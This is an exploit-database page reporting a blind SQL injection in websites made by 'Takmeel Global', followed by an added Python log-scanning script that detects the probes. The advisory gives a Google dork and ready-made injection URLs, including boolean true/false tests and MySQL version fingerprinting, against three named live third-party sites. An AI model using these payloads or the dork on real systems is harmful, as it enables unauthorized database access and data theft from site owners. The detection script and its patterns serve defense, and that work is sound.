CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | Varies | Critical |

Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | High | Remote | 2021-09-19 |

CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N | 0.02192 | 0.50148 |

*********************************************************

#Exploit Title: Takmeel Global - Blind Sql Injection Vulnerability

#Date: 2021-09-19

#Exploit Author: Behrouz Mansoori

#Google Dork: "by Takmeel Global"

#Category:webapps

#Tested On: windows 10, Firefox

[+] First add "and true" and then "and false" to the end of the link :

* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false

### Demo 1:

* https://nisreenkayyali.com/project-detail.php?id=25%27%20and%20true--+
* https://nisreenkayyali.com/project-detail.php?id=25%27%20and%20false--+
* https://nisreenkayyali.com/project-detail.php?id=25%27%20and%20substring(@@version,1,1)=5--+

### Demo 2:

* http://www.glsuae.com/projects.php?id=2%27%20and%20true--+
* http://www.glsuae.com/projects.php?id=2%27%20and%20false--+
* http://www.glsuae.com/projects.php?id=2%27%20and%20substring(@@version,1,1)=5--+

### Demo 3:

* http://investmentengineering.ae/en/project-detail.php?id=240%27%20and%20true--+
* http://investmentengineering.ae/en/project-detail.php?id=240%27%20and%20false--+
* http://investmentengineering.ae/en/project-detail.php?id=240%27%20and%20substring(@@version,1,1)=1--+

*********************************************************

#Discovered by: Behrouz mansoori

#Instagram: Behrouz_mansoori

#Email: [email protected]

*********************************************************
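
For defenders, the "and true" / "and false" request pair described above leaves a recognizable trace in web access logs. The following is an added example, not part of the original advisory: it scans combined-format log lines for that pair sent by one client to the same parameter, and counts `substring(@@version` follow-ups. The log lines, IP addresses, response sizes and the function name `find_blind_sqli_probes` are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines; the IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Sep/2021:10:01:02 +0000] "GET /project-detail.php?id=25%27%20and%20true--+ HTTP/1.1" 200 5120
203.0.113.7 - - [19/Sep/2021:10:01:05 +0000] "GET /project-detail.php?id=25%27%20and%20false--+ HTTP/1.1" 200 1874
203.0.113.7 - - [19/Sep/2021:10:01:09 +0000] "GET /project-detail.php?id=25%27%20and%20substring(@@version,1,1)=5--+ HTTP/1.1" 200 5120
198.51.100.4 - - [19/Sep/2021:10:02:00 +0000] "GET /project-detail.php?id=25 HTTP/1.1" 200 5120
198.51.100.9 - - [19/Sep/2021:10:03:00 +0000] "GET /search.php?q=true+and+false HTTP/1.1" 200 900
"""

LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')
# Optional quote, then and/or plus a boolean literal, then a SQL comment marker.
BOOLEAN = re.compile(r"""['"]?\s*\b(?:and|or)\s+(true|false)\s*(?:--|#)""", re.I)
# Version fingerprinting of the kind shown in the advisory's third request.
FINGERPRINT = re.compile(r"substring\s*\(\s*@@version", re.I)


def find_blind_sqli_probes(log_text):
    """Return {(client, path, param): finding} where a true/false pair was seen."""
    seen = defaultdict(lambda: {"true": [], "false": [], "fingerprint": 0})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        url = urlsplit(target)
        # parse_qsl URL-decodes values, so %27 becomes ' and + becomes a space.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            key = (client, url.path, name)
            hit = BOOLEAN.search(value)
            if hit:
                seen[key][hit.group(1).lower()].append(int(size))
            if FINGERPRINT.search(value):
                seen[key]["fingerprint"] += 1
    findings = {}
    for key, s in seen.items():
        if s["true"] and s["false"]:  # both halves of the boolean test were sent
            findings[key] = {
                # Different body sizes mean the page answered the boolean question.
                "response_differs": set(s["true"]) != set(s["false"]),
                "fingerprint_requests": s["fingerprint"],
            }
    return findings
```

A finding with `response_differs` set to true marks a parameter whose query should be moved to a prepared statement with bound parameters.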
Copyright ©2024 Exploitalert.